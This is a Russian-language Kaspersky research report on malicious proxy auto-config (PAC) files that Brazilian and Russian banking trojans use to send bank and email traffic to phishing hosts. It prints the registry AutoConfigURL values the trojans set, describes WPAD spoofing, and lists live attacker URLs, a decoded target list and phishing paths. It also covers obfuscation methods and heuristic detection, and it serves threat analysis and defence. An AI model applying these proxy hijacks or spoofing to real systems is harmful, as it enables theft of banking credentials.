Исследование

PAC — файл автоконфигурации проблем

1.  Автоконфигурация прокси

PAC-файлы, или файлы автоконфигурации прокси-сервера – это широко используемый ресурс, который поддерживается всеми современными браузерами. Они определяют так называемый метод доступа: то, какой прокси-сервер должен использовать веб-браузер и другие интернет-приложения для доступа к конкретному URL-адресу.

Формат PAC-файла был первоначально разработан компанией Netscape в 1996 г. для браузера Netscape Navigator 2.0. Браузер, поддерживающий PAC-файлы, предоставляет доступ к списку функций, определенных в оригинальной спецификации Netscape. В каждом браузере PAC-файлы реализуются в «песочнице» – доступ предоставляется только тем функциям JavaScript, которые требуются для работы. Например, невозможно получить доступ к свойству браузера «User Agent» в PAC-файле, хотя это было бы доступно для обычной web-страницы.

PAC-файл – это текстовый файл, определяющий по крайней мере одну функцию  JavaScript – FindProxyForURL(url, host). Функция принимает два аргумента: «url» – это URL-адрес объекта, и «host» – это имя узла, полученное из этого URL-адреса. Функция возвращает адрес прокси-сервера, который следует использовать для доступа к указанному URL-адресу, или строку «DIRECT», если прокси не нужен. Традиционно PAC-файл называется proxy.pac.

Данная функция чрезвычайно полезна для администраторов корпоративных сетей, поскольку позволяет настраивать использование прокси-сервера только для внешних ресурсов, исключая внутренние. Местонахождение PAC-файла настраивается – это может быть, например, сетевой адрес, где находится скрипт. Этот URL-адрес должен быть вбит в настройки браузера:

pac_assonlini_makhnutin_01

Рис. 1. URL-адрес, ведущий на PAC-файл, в настройках Internet Explorer

Либо,  PAC файл может располагаться локально:

pac_assonlini_makhnutin_02

Рис. 2. Сконфигурированный в Firefox локальный PAC-файл

PAC-файл может включать поддержку при отказе сервера, продвинутую поддержку для обхода прокси-сервера и многое другое:

Размещение Преимущества Недостатки
PAC
  • Поддержка при отказе сервера
  • Поддержка правил продвинутого/динамического  обхода прокси-сервера; имеет возможность разрешения хостов/IP с помощью DNS для снижения сложности списка исключений.
  • Поддерживается во всех основных браузерах.
  • В большинстве случаев требует использования web-сервера
  • необходимо знание JavaScript

Табл. 1.Плюсы и минусы использования PAC-файлов

Ниже приводится документация функций, поддерживаемых и допустимых в изолированной среде:

  • dnsDomainIs: оценивает имена хостов и возвращает «true», если имена хостов совпадают.
  • shExpMatch: пытается соотнести имя хоста или URL-адрес с конкретной shell-маской. При успешном соотнесении возвращает «true».
  • isInNet: оценивает IP-адрес имени хоста и возвращает «true», если он найден в указанной подсети. Если на вход задаётся имя хоста, функция разрешает его в IP-адрес.
  • myIpAddress: возвращает IP-адрес хост-машины.
  • dnsResolve: разрешает имя хоста в IP-адрес. Функцию можно использовать, чтобы сократить количество DNS-преобразований.
  • isPlainHostName: возвращает «true», если имя хоста не содержит точек, например http://intranet. Полезно при применении исключений для внутренних веб-страниц – можно исключить необходимость разрешать имя хоста в IP-адрес, чтобы определить, что оно локальное.
  • localHostOrDomainIs: оценивает имя хоста и возвращает «true» только в том случае, если найдено точное совпадение имени хоста.
  • isResolvable: пытается разрешить имя хоста в IP-адрес, в случае успеха возвращает «true».
  • dnsDomainLevels: возвращает количество уровней DNS-доменов (число точек в адресе) в имени хоста. Может использоваться для создания исключений для внутренних веб-страниц, использующих короткие DNS-имена, например http://intranet.
  • timeRange, dateRange, weekdayRange: позволяет применять правила в определенное время, например возвращать прокси в конкретное время суток, по определенным датам или месяцам и т.п.
  • alert: функция alert() не входит в первоначальную спецификацию PAC, хотя и поддерживается в Internet Explorer и Firefox. Может использоваться для выдачи значения переменной или результата функции в виде, который может просматривать конечный пользователь. Это может быть полезно при выявлении и устранении проблем с правилами для файлов PAC.

Ниже приводится пример PAC-файла:

pac_assonlini_makhnutin_03

Рис. 3. Пример типового файла PAC

Протокол автоматической настройки прокси (Web Proxy Auto-Discovery Protocol, WPAD)

Протокол автоматической настройки прокси (Web Proxy Auto-Discovery Protocol, WPAD) – средство, которое позволяет Windows-машинам определять, где в сети находится конфигурационный PAC-файл. Операционная система, поддерживающая как DHCP, так и DNS, сначала попытается найти PAC-файл, используя DHCP. Если DHCP не использовался при настройке сети, или среди информации, принятой от DHCP-сервера нет сведений о PAC, то система попытается найти PAC-файл с помощью DNS.

Как и у PAC-файлов, у метода WPAD  есть свои преимущества и недостатки при использовании в корпоративных сетях:

Размещение Преимущества Недостатки
WPAD
  • включает все преимущества PAC.
  • Для размещения нужно только поставить «галочку» в соответствующее поле
  • включает все недостатки PAC.
  • требует изменения в инфраструктуре  DHCP

Таблица 2. Преимущества и недостатки использования WPAD

Алгоритм нахождения веб-прокси при использовании WPAD выглядит следующим образом:

  1. Получена ли запись WPAD от DHCP-сервера? Если да, то перейти к п. 4.
  2. Запросить DNS-сервер, какой пользователь сети называется «wpad» (или wpad.[mydomain.com]). Если запрос успешен, перейти к п. 4.
  3. Отправить широковещательное сообщение Службы имён NetBIOS (NetBIOS Name Service) с запросом «WPAD».  Если какой-либо узел в сети ответил, что его зовут «WPAD», то перейти к п. 4, в противном случае не использовать никакой веб-сервер.
  4. Скачать файл wpad.dat с сервера, адрес которого был получен через DHCP или DNS.
  5. Использовать IP-адрес, указанный в wpad.dat, в качестве прокси-сервера для всего веб-трафика, включая HTTPS.

Для злоумышленников и желающих потестировать защищенность системы от несанкционированного доступа, функциональность WPAD в ОС Windows на протяжении многих лет предоставляла простой путь для выполнения MITM-атак на веб-трафик. WPAD, к примеру, использовался для подмены обновлений Windows во время атаки Flame.

Проблема с реализацией WPAD в ОС Windows связана с тем, что в ней используется служба имён NetBIOS (NetBIOS Name Service; далее NBNS), которая уязвима к спуфинг-атакам.

По умолчанию, Windows-машины сконфигурированы так, что в первую очередь запрашивают имя у WINS-сервера. На большинстве комьютеров нет настроек, которые бы указывали, какой WINS сервер настраивать, поэтому NBNS попытается выяснить адрес WPAD-сервера у всех компьютеров в своем сегменте сети посредством широковещательного запроса. В этот момент и происходит спуфинг, т.е. подмена данных.

pac_assonlini_makhnutin_04

Рис. 4. Запрос Службы имён NetBIOS (NetBIOS Name Service), ищущей WPAD-сервер

Для проведения атаки злоумышленник может разработать приложение, которое будет прослушивать порт 137 протокола UDP и отвечать на все запросы «WPAD», посылая в ответ адрес вредоносного веб-сервера. Веб-сервер, в свою очередь, может выдавать вредоносный PAC-файл, согласно которому браузеры будут использовать конкретные прокси-сервера, через которые будет осуществляться соединение к веб-сайтам, в которых заинтересован злоумышленник.

2. Проблема автоконфигурации

Хотя PAC – это полезная функциональность, факты злоупотребления ею известны с 2005 г. Бразильские киберпреступники улучшили и усовершенствовали технологию таких злоупотреблений, после чего поделились ими с коллегами из Турции и России.

Сложность и эффективность этих атак достигла беспрецедентного уровня – стало возможно взломать банковский счёт при помощи файла величиной всего в 1 КБ. Сочетая значительную изобретательность с drive-by атаками, такие вредоносные скрипты могут сделать больше, чем атаки «человек посередине» (man-in-the-middle attack); они могут перехватывать HTTP-соединения в ходе «скрытных» веб-атак, которые могут проводиться регулярно и успешно. Обычно такие атаки перенаправляют пользователей на фишинговые страницы, имитирующие легальные сайты банков, операторов кредитных карт и т.д.

В Бразилии, вредоносные PAC-файлы в банковских троянцах известны с 2009 г. – именно тогда были зафиксированы несколько семейств зловредов, таких как Trojan.Win32.ProxyChanger, которые принудительно внедряют URL-адреса PAC-файлов в браузер на зараженных компьютерах.

pac_assonlini_makhnutin_05

Рис 5. Фишинговая страница, имитирующая официальную страницу бразильского банка. В настойках браузера выставлен адрес вредоносного PAC-файла

Сейчас 6 из каждых десяти банковских троянцев в Бразилии способны добавлять адрес вредоносного PAC-файла в настройки браузера.

pac_assonlini_makhnutin_06

Рис. 6. Текст вредоносного PAC-файла, созданного и используемого бразильскими киберпреступниками

Некоторые троянцы также пытаются изменить файл prefs.js, при помощи которого устанавливаются настройки прокси-сервера в Mozilla Firefox:

pac_assonlini_makhnutin_07

Рис 7. Банковский троянец готовится изменить файл prefs.js с настройками прокси-сервера для Firefox

Это очень простая атака, троянцу нужно всего лишь сменить одно-единственное значение в реестре Windows, указав URL-адрес PAC-файла:

HKCUSoftwareMicrosoftWindowsCurrentVersionInternet Settings: «AutoConfigURL = http://www.badsite.com/pacscript.pac

Либо указать путь к маленькому (обычно менее 1 КБ) файлу, размещенному локально:

HKCUSoftwareMicrosoftWindowsCurrentVersionInternet Settings,AutoConfigURL = file://C:/WINDOWS/proxy.pac

В ходе некоторых атак также меняются значения ключа, указанного ниже – он отвечает за автоматическую установку прокси-сервера для конкретного интернет-соединения:

HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionInternet SettingsConnections{CONNECTION NAME}

Киберпреступники могут значительно расширить доступные способы проведения атак (и увеличить потенциальное количество жертв), совместив эту методику с атаками через drive-by загрузки, эксплуатацией уязвимостей в Java, внедрением вредоносных Java-апплетов на популярные веб-сайты или даже с использованием наборов эксплойтов, таких как BlackHole.

pac_assonlini_makhnutin_08

Рис. 8. Фрагмент кода вредоносной программы, загруженной через BlackHole, с помощью которой бразильские киберпреступники меняли настройки на компьютере пользователя, внедряя туда PAC-файл

Подход настолько эффективен, что российские банковские троянцы, такие как Trojan-Banker.Win32.Capper, его переняли в 2012 г. вместе с подделкой цифровых сертификатов, чтобы перенаправлять пользователей на фишинговую страницу по протоколу HTTPS.

Некоторые мошенники применяют социальную инженерию, чтобы обмануть пользователя и удержать вредоносный URL-адрес в настройках браузера, используя обманные доменные имена, которые на первый взгляд кажутся легитимными. Вот несколько примеров вредоносных URL-адресов:

http://egcon.com.br/images/avast.pac
http://defaultcache.com.br/ie
http://vpn.install-pcseguro.com/ssl.js
http://update.microsoft.com.br-ieconfig.ma.cx/security.jsp
http://sec.autoatt.com/
http://ww1.appsegurancamobile.com/kb2438658.php

Для обеспечения безопасности пользователей, мы стали блокировать URL-адреса, ведущие на вредоносные PAC-файлы. В ответ на это, некоторые троянцы стали использовать случайные URL-адреса, меняющиеся при каждой перезагрузке. Другие троянцы стали использовать короткие URL-адреса от сервисов типа bit.ly, надеясь таким образом оставить за собой контроль над вредоносными перенаправлениями и собрать статистику посещаемости URL-адреса.

pac_assonlini_makhnutin_09

Рис. 9. URL-ссылка «bit.ly», ведущая на PAC-файл и собравшая более миллиона нажатий за 10 дней

Мы обнаружили, что чёрные списки не обеспечивают достаточную защиту, и решили создать сигнатуры для детектирования этих маленьких PAC-файлов под вердиктом Trojan-Banker.JS.Proxy. Мы создали сигнатуры для целого ряда файлов:

pac_assonlini_makhnutin_10

Рис. 10.Сигнатурное детектирование некоторых вредоносных PAC-файлов

С этого момента наша игра в кошки-мышки с бразильскими киберпреступниками начала становиться более интересной.

3. Мелкие архивные преступления

После того как некоторые производители защитных решений начали работу над сигнатурным детектированием вредоносных PAC-скриптов, злоумышленники сделали ответный ход: прибегли к более глубокой обфускации вредоносного кода, чтобы обойти детектирование.

Подход оказался успешным: по сегодняшний день, защитные продукты практически всех производителей очень плохо детектируют вредоносные PAC-файлы. Поскольку PAC-файлы – это легитимный рабочий инструмент пользовательских браузеров, и поскольку существуют подлинные, не вредоносные PAC-файлы, производители защитных решений зачастую очень осторожно подходят к детектированию вредоносных PAC-файлов, чтобы не вызвать ложных срабатываний. Некоторые из них не готовы предложить вообще никакого решения этой проблемы.

Чтобы обойти сигнатурное детектирование, бразильские киберпреступники стали использовать все виды обфускации JavaScript-кода во вредоносных PAC-файлах. Некоторые пошли дальше: создали инструменты автоматического выполнения обфускации и стали продавать их партнерам по «бизнесу» за 5000 бразильских реалов (около 2500 долларов США).

pac_assonlini_makhnutin_11

Рис. 11. Криминальный софт «PAC do Baixada», созданный бразильскими умельцами для обфускации кода во вредоносных PAC-файлах

Другие предпочитают пользоваться онлайн-сервисами шифрования JavaScript-кода:

pac_assonlini_makhnutin_12

Рис. 12. Онлайн-сервис шифрования JavaScript-кода

В результате «в дикой природе» стали появляться необычные зашифрованные образцы вредоносных скриптов, со всеми видами обфускации. В примере ниже использована обфускация с применением конкатенации:

pac_assonlini_makhnutin_13

Рис. 13. PAC-файл, обфусцированный методом конкатенации

А в этом примере использован метод переворачивания строк:

pac_assonlini_makhnutin_14

Рис. 14. PAC-файл, обфусцированный методом переворачивания

Другие решили заменить имена доменов-жертв их IP-адресами:

pac_assonlini_makhnutin_15

Рис. 15. PAC-файл, в котором вместо имён доменов прописаны их IP-адреса

Третьи стали использовать глубокую обфускацию JavaScript-кода:

pac_assonlini_makhnutin_16

Рис. 16. Вредоносный PAC-файл после глубокой обфускации

В некоторых случаях киберпреступники обратились к «замусориванию» кода большим количеством лишних символов:

pac_assonlini_makhnutin_17

Рис. 17. «Замусоренный» вредоносный PAC-файл с лишними символами и символьными кодами

В некоторые PAC-файлы киберпреступники даже стали встраивать сообщения-предупреждения для аналитиков вредоносного ПО. Вот пример:

pac_assonlini_makhnutin_18

Рис. 18. Сообщение в заголовке PAC-файла:
«Б***, зачем эти ублюдки лезут в мои PAC-файлы? От***сь, дайте мне свободно работать, мне семью нужно кормить, отстаньте уже! Если хотите со мной работать, напишите на xxxxxx@bol.com.br».

В другом PAC-файле мы обнаружили сообщение и приветствия «коллегам по бизнесу»:

pac_assonlini_makhnutin_19

Рис. 19.Текст сообщения: «Не пытайтесь удалить или редактировать этот файл, сообщать о нём куда-либо или публиковать в Twitter. Обитатели ада всё равно восстановят все перенаправления, и все в итоге будут счастливы. Привет ворам…(список никнеймов)»

Разбор вредоносного PAC-файла

Разберём подробнее следующий пример, в котором содержимое PAC-файла зашифровано операцией XOR:

pac_assonlini_makhnutin_20

Рис. 20. Вредоносный XOR-файл, зашифрованный операцией XOR

После расшифровки особым XOR-ключом, обнаруживаем в скрипте большой список мишеней для атак, включающий:

  • Банки в Бразилии и остальной Латинской Америке
  • Компании-операторы кредитных карт
  • Авиакомпании – для кражи миль, накопленных пользователями в бонусных программах
  • Сервисы электронной почты – Gmail, Hotmail, Yahoo
  • Платёжные системы – Paypal, PagSeguro и т.д.
  • Сервисы финансовой информации, такие как Serasa Experia
  • B2C-веб-сайты, в первую очередь популярные веб-сайты для электронной коммерции.

В этом примере все URL-ссылки, указанные ниже, будут открываться через прокси «att.nossodomain2.me»:

rrr+mjqhdli+fjh :  www.hotmail.com

mjqhdli+fjh :  hotmail.com

mjqhdli+fjh+gw :  Hotmail.com.br

rrr+mjqhdli+fjh+gw :  www.hotmail.com.br

hvk+fjh :  msn.com

rrr+hvk+fjh :  www.msn.com

ils+fjh :  live.com

rrr+ils+fjh :  www.live.com

rrr+lqdp+fjh+gw :  www.itau.com.br

rrr+gdkfjlqdp+fjh+gw :  www.bancoitau.com.br

gdkfjlqdp+fjh+gw :  bancoitau.com.br

lqdp+fjh+gw :  itau.com.br

rrr+lqdpuwvjkkdilq+fjh+gw :  www.itaupersonnalite.com.br

lqdpuwvjkkdilq+fjh+gw :  itaupersonnalite.com.br

rrr+vwdvd+fjh+gw :  www.serasa.com.br

vwdvd+fjh+gw :  serasa.com.br

vwdvd}uwldk+fjh+gw :  serasaexperian.com.br

rrr+vwdvd}uwldk+fjh+gw :  www.serasaexperian.com.br

rrr+vdkqdkaw+fjh+gw :  www.santander.com.br

vdkqdkaw+fjh+gw :  santander.com.br

rrr+vdkqdkawkq+fjh+gw :  www.santandernet.com.br

vdkqdkawkq+fjh+gw :  santandernet.com.br

rrr+gdkwlvpi+fjh+gw :  www.banrisul.com.br

gdkwlvpi+fjh+gw :  banrisul.com.br

rrr+mvgf+fjh+gw :  www.hsbc.com.br

mvgf+fjh+gw :  hsbc.com.br

dhwlfdk}uwvv+fjh+gw :  americanexpress.com.br

rrr+dhwlfdk}uwvv+fjh :  www.americanexpress.com

dhwlfdk}uwvv+fjh :  americanexpress.com

rrr+gdkv+fjh+gw :  www.banese.com.br

gdkv+fjh+gw :  banese.com.br

rrr+gwdavfjuo+fjh+gw :  www.bradescopj.com.br

gwdavfjuo+fjh+gw :  bradescopj.com.br

gwdavfjkqhuwvd+fjh+gw :  bradesconetempresa.com.br

rrr+gwdavfjkqhuwvd+fjh+gw :  www.bradesconetempresa.com.br

rrr+gwdavfj+fjh+gw :  www.bradesco.com.br

rrr+gwdavfjuwlh+fjh+gw :  www.bradescoprime.com.br

gwdavfj+fjh+gw :  bradesco.com.br

gwdavfjuwlh+fjh+gw :  bradescoprime.com.br

uwlh+fjh+gw :  prime.com.br

rrr+gwdavfjuvvjdopwlalfd+fjh+gw :  www.bradescopessoajuridica.com.br

gwdavfjuvvjdopwlalfd+fjh+gw :  bradescopessoajuridica.com.br

rrr+gg+fjh+gw :  www.bb.com.br

gg+fjh+gw :  bb.com.br

gdkfjajgwdvli+fjh+gw :  bancodobrasil.com.br

rrr+gdkfjajgwdvli+fjh+gw :  www.bancodobrasil.com.br

rrr+fdl}d+fjh+gw :  www.caixa.com.br

rrr+fdl}d+bjs+gw :  www.caixa.gov.br

rrr+fdl}dfjkjhlfd+fjh+gw :  www.caixaeconomica.com.br

rrr+fdl}dfjkjhlfd+bjs+gw :  www.caixaeconomica.gov.br

rrr+fdl}dfjkjhlfdcawdi+fjh+gw :  www.caixaeconomicafederal.com.br

rrr+fdl}dfjkjhlfdcawdi+bjs+gw :  www.caixaeconomicafederal.gov.br

rrr+fc+fjh+gw :  www.cef.com.br

rrr+fc+bjs+gw :  www.cef.gov.br

fdl}d+fjh+gw :  caixa.com.br

fdl}d+bjs+gw :  caixa.gov.br

fdl}dfjkjhlfd+fjh+gw :  caixaeconomica.com.br

fdl}dfjkjhlfd+bjs+gw :  caixaeconomica.gov.br

fdl}dfjkjhlfdcawdi+fjh+gw :  caixaeconomicafederal.com.br

fdl}dfjkjhlfdcawdi+bjs+gw :  caixaeconomicafederal.gov.br

fc+fjh+gw :  cef.com.br

fc+bjs+gw :  cef.gov.br

rrr+vlfwal+fjh+gw :  www.sicredi.com.br

vlfwal+fjh+gw :  sicredi.com.br

rrr+udbvbpwj+fjh+gw :  www.pagseguro.com.br

udbvbpwj+fjh+gw :  pagseguro.com.br

udbvbpwj+pji+fjh+gw :  pagseguro.uol.com.br

flqlgdkn+fjh+gw :  citibank.com.br

rrr+flqlgdkn+fjh+gw :  www.citibank.com.br

ud|udi+fjh :  paypal.com

rrr+ud|udi+fjh :  www.paypal.com

gkg+bjs+gw :  bnb.gov.br

rrr+gkg+bjs+gw :  www.bnb.gov.br

rrr+gwg+fjh+gw :  www.brb.com.br

gwg+fjh+gw :  brb.com.br

lkqjpfm+pklqcjpw+fjh+gw :  intouch.unitfour.com.br

dduo+gg+fjh+gw :  aapj.bb.com.br

fqih+fjh+gw :  cetelem.com.br

rrr+fqih+fjh+gw :  www.cetelem.com.br

vdcwd+fjh+gw :  safra.com.br

rrr+vdcwd+fjh+gw :  www.safra.com.br

gdkwlvpi+fjh+gw :  banrisul.com.br

rrr+gdkwlvpi+fjh+gw :  www.banrisul.com.br

gdvd+fjh+gw :  basa.com.br

rrr+gdvd+fjh+gw :  www.basa.com.br

rrr+umlvmqdkn+fjh :  www.phishtank.com

umlvmqdkn+fjh :  phishtank.com

rrr+qmwdq}uwq+fjh :  www.threatexpert.com

qmwdq}uwq+fjh :  threatexpert.com

rrr+slwpvqjqdi+fjh+gw :  www.virustotal.com.br

slwpvqjqdi+fjh+gw :  virustotal.com.br

slwpvvfdk+fjh :  virusscan.com

rrr+slwpvvfdk+fjh :  www.virusscan.com

rrr+ilkmdackvlsd+jwb :  www.linhadefensiva.org

ilkmdackvlsd+jwb :  linhadefensiva.org

bji+fjh+gw :  gol.com.br

rrr+bji+fjh+gw :  www.gol.com.br

rrr+sjbji+fjh+gw :  www.voegol.com.br

sjbji+fjh+gw :  voegol.com.br

vdcwdkq+fjh+gw :  safranet.com.br

rrr+vdcwdk`q+fjh+gw :  www.safranet.com.br

dh3:  att.nossodomain2.me

Если до того, как пользователь попытается открыть любую из этих веб-страниц, в браузере сконфигурирован вредоносный PAC-файл, то URL-адрес, отображаемый в адресной строке, кажется легитимным, но на деле скрывает фишинговую страницу. В результате, многие пользователи становятся жертвами этих атак, не осознавая этого.

В список также входит несколько сервисов безопасности, таких как PhishTank, VirusTotal, ThreatExpert, VirusScan, LinhaDefensiva.org. Вредоносный PAC-файл блокирует доступ к этим сайтам, предписывая браузеру открыть их через прокси-сервер 127.0.0.1.

На вредоносном домене, куда перенаправляется весь трафик, находим фишинговые страницы, приготовленные злоумышленником. У всех них интересные имена; для примера приведём некоторые из них:

Phishing URL Target
att.nossodomain2.me/peipau Paypal
att.nossodomain2.me/citi Citibank
att.nossodomain2.me/desco Bradesco Bank
att.nossodomain2.me/santa Santander Bank
att.nossodomain2.me/bb Banco do Brasil
att.nossodomain2.me/taui Itau Bank
att.nossodomain2.me/tamtam TAM (Brazilian airline company)
att.nossodomain2.me/azulinha Caixa Bank

Таблица 3. Некоторые фишинговые URL-адреса, используемые во вредоносном PAC-файле, и их мишени

Другие скрипты также блокируют доступ к сайтам и серверам обновления различных антивирусных продуктов:

pac_assonlini_makhnutin_21

Рис. 21. Вредоносный PAC-файл, который пытается заблокировать доступ к антивирусным обновлениям

Если зараженный пользователь пытается зайти на сайт антивирусной компании, то выводится такое сообщение:

pac_assonlini_makhnutin_22

Рис. 22. Поддельное сообщение «Сервис недоступен. Попробуйте позже», которое демонстрирует вредоносный PAC-файл на зараженном компьютере

Если пользователь пытается попросить помощи в специализированных онлайн-сообществах, например, спросить на форуме совета, как удалить зловред, вредоносный PAC-файл также пытается заблокировать доступ к этим сайтам, особенно к бразильскому сайту LinhaDefensiva.org, на форумах которого можно получить бесплатную помощь по борьбе с вредоносным ПО.

Некоторые PAC-файлы перенаправляют пользователей на страницу, имитирующую «синий экран»:

pac_assonlini_makhnutin_23

Рис. 23. «Синий экран» в браузере? Нет, это поддельная страница, которая отображается, когда с зараженного компьютера пытаются зайти на вебсайт LinhaDefensiva.org

Судя по всему, вредоносные PAC-файлы – это «многосторонний» инструмент для проведения онлайн-атак: с ними можно не только перенаправлять пользователей на фишинговые страницы, чтобы красть учётные данные (чаще всего к финансовым сервисам), но и блокировать им доступ к веб-сайтам производителей защитных решений или в сообщества, где пользователь мог бы получить помощь касательно зараженного компьютера. Эти PAC-файлы могут даже заблокировать эффективную работу PhishTank, поскольку они стараются представить браузеру свои фишинговые страницы как «чистые».

Увидев, насколько эффективны эти атаки для взлома учётных записей онлайн-банкинга, киберпреступники стали принять этот метод к другим мишеням – опять с той же целью украсть денег. В недавнем примере при помощи PAC-файлов выполнялось перенаправление на фишинговые страницы, имитирующие mtgox.com – наиболее широко используемую площадку для обмена игровой валюты Bitcoin:

pac_assonlini_makhnutin_24

Рис. 24. Виртуальная валюта Bitcoin также «попала под удар» вредоносных PAC-файлов

В других случаях пользователей перенаправляют с популярных веб-сайтов на специальные страницы, наполненные рекламой и спонсорскими ссылками. Это делается, чтобы сгенерировать трафик и набрать побольше нажатий, чтобы заработать денег у сервисов спонсируемой рекламы, таких как Google Adwords.

pac_assonlini_makhnutin_25

Рис. 25. «busca.afiliados.pac» означает «ищу партнёров»

Ещё один киберпреступник решил украсть пароли к государственным веб-сервисам, таким как consultasintegradas.rs.gov.br – это веб-сайт, где размещаются данные граждан в бразильском штате Риу-Гранди-ду-Сул:

pac_assonlini_makhnutin_26

Рис. 26. Бразильский государственный веб-сервис – мишень для вредоносного PAC-файла

4. Планирование ответной меры

С 2009 г. бразильские киберпреступники активно используют вредоносные PAC-файлы в браузерах для кражи банковских учетных записей. Метод бесшумен, эффективен, а многие защитные продукты не предоставляют защиты от него.

Этот вид атак позволяет бразильским кибермошенникам красть большие суммы денег, в основном из местных банков. Бразильская банковская федерация (FEBRABAN) заявила, что в 2012 г. её члены потеряли 1,2 млрд. бразильских реалов (около 700 млн. долларов США).

Статистика по вредоносному семейству Trojan.Win32.ProxyChanger подтверждает, что оно наиболее распространено в Бразилии и России:

pac_assonlini_makhnutin_27

Рис. 27. Страны, наиболее затронутые Trojan ProxyChanger в первом полугодии 2013 г.: Бразилия, Португалия и Россия

Сам вредоносный PAC-файл, из семейства Trojan-Banker.JS.Proxy, имеет похожее распространение по странам. В лидерах – опять Бразилия с Россией:

pac_assonlini_makhnutin_28

Рис. 28. Страны, наиболее затронутые Trojan-Banker.JS.Proxy в первом полугодии 2013 г.

И снова – Бразилия и Россия оказываются наиболее затронутыми банковским троянцем Trojan-Banker.PAC.Agent, который меняет прокси-сервера в настройках браузеров:

pac_assonlini_makhnutin_29

Рис. 29. Страны, наиболее затронутые Trojan-Banker.PAC.Agent в первом полугодии 2013 г.

Как же распознать такие угрозы? Вредоносные PAC-файлы используют глубокую обфускацию, чтобы обойти сигнатурное детектирование, так что имеет смысл их детектировать эвристическими методами. Такой подход тем более уместен, что широко распространены и легитимные PAC-файлы повсеместно встречаются в корпоративных средах.

pac_assonlini_makhnutin_30

Рис. 30. Легитимный PAC-файл, используемый в университетской сети

В продуктах «Лаборатории Касперского» используется метод детектирования, основанный на JavaScript-эмуляции: эмулятор вызывает функцию FindProxyForURL, задавая ей на вход адреса различных банков, и оценивает результат. Если функция возвращает адрес прокси для страниц банков и «DIRECT» для других веб-сайтов, то PAC-файл является вредоносным.

Эта методика обеспечивает проактивное детектирование PAC-файла, поскольку результаты эмуляции остаются теми же вне зависимости от того, насколько сильно обфусцирован файл.

pac_assonlini_makhnutin_31

Рис. 31. Эвристическое детектирование в действии

Наше окончательное решение проблемы – это «Безопасные платежи«. Это набор функций, включающий SSL-верификацию «в облаке», которая .проверяет, легитимна ли веб-страница, и предупреждает пользователя, если с сертификатом безопасности есть какая-либо проблема:

pac_assonlini_makhnutin_32

Рис. 32. Safe Money проверяет страницы на легитимность и защищает браузеры от заражения

Заключение

Эти вредоносные скрипты остаются вне поля зрения большинства антивирусных компаний, некоторые из которых даже не пытаются распознавать и блокировать такие атаки. Наша цель – побудить всех производителей исследовать этот вид атак и сообща выработать надёжную защиту и эффективные меры противодействия. Киберпреступники делают всё, чтобы обойти детектирование, и будут вкладывать в инструменты для обфускации кода, чтобы продолжать красть деньги у невинных пользователей.

PAC — файл автоконфигурации проблем

Ваш e-mail не будет опубликован. Обязательные поля помечены *

 

Отчеты

StripedFly: двуликий и незаметный

Разбираем фреймворк StripedFly для целевых атак, использовавший собственную версию эксплойта EternalBlue и успешно прикрывавшийся майнером.

Азиатские APT-группировки: тактики, техники и процедуры

Делимся с сообществом подходами, которые используют азиатские APT-группировки при взломе инфраструктуры, и подробной информацией о тактиках, техниках и процедурах (TTPs) злоумышленников, основанной на методологии MITRE ATT&CK.

Как поймать «Триангуляцию»

Эксперты «Лаборатории Касперского» смогли получить все этапы «Операции Триангуляция»: эксплойты нулевого дня для iOS, валидаторы, имплант TriangleDB и дополнительные модули.

Подпишитесь на еженедельную рассылку

Самая актуальная аналитика – в вашем почтовом ящике